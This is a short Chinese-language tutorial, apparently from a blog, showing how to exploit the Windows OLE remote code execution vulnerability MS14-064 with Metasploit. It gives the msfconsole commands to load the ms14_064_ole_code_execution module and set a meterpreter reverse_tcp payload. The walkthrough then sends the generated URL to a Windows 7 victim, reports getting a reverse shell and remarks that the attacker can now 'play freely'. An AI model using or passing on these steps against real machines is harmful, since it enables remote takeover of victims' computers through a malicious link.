Microsoft Windows OLE遠程代碼執行漏洞,OLE(對象鏈接與嵌入)是一種允許應用程序共享數據和功能的技術,
遠程攻擊者利用此漏洞通過構造的網站執行任意代碼,影響Win95+IE3 – Win10+IE11全版本...
metasploit里已經加入了此漏洞的利用模塊 :exploit/windows/browser/ms14_064_ole_code_execution
執行命令:
msfconsole //啟動MSF
search ms14 //搜索關鍵字
use exploit/windows/browser/ms14_064_ole_code_execution // 加載漏洞利用模塊
set payload windows/meterpreter/reverse_tcp //設置反彈連接shell
如圖:
需要注意的是箭頭標記的屬性默認為false 需要設置為true ,因為msf中自帶的漏洞利用exp調用的是 powershell,
所以msf(Metasploit Framework)中的exp代碼只對安裝powershell的系統生效。win7系統安裝自帶powershell,
所以我們這里測試受害的機器為windows7 32位.
按照圖中各個屬性配置好后 執行exploit即可
得到一個URL地址,復制到受害者機器(win7)測試
當用戶點擊允許了后
可以看見這邊反彈了一個shell,接下里我們就可以隨便玩了,
測試成功,結束。